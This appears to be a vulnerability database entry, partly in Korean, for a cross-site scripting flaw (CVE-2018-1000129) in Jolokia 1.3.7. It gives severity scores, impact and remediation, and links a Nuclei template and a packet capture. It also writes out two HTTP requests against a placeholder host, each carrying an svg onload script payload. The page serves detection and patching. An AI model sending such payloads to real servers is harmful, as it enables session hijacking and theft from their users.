🔙 목록으로 돌아가기

CVE-2018-1000129: Jolokia 1.3.7 - Cross-Site Scripting

TitleJolokia 1.3.7 - Cross-Site Scripting
Authormavericknerd,0h1in9e,daffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
CVSS Score6.1
EPSS Score0.67423
CVE IDCVE-2018-1000129
CWE IDCWE-79
Tags cve2018 cve jolokia xss vuln

🔍 Vulnerability Description

Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim’s browser.

🌐 HTTP Request

GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-1000129.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-1000129.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A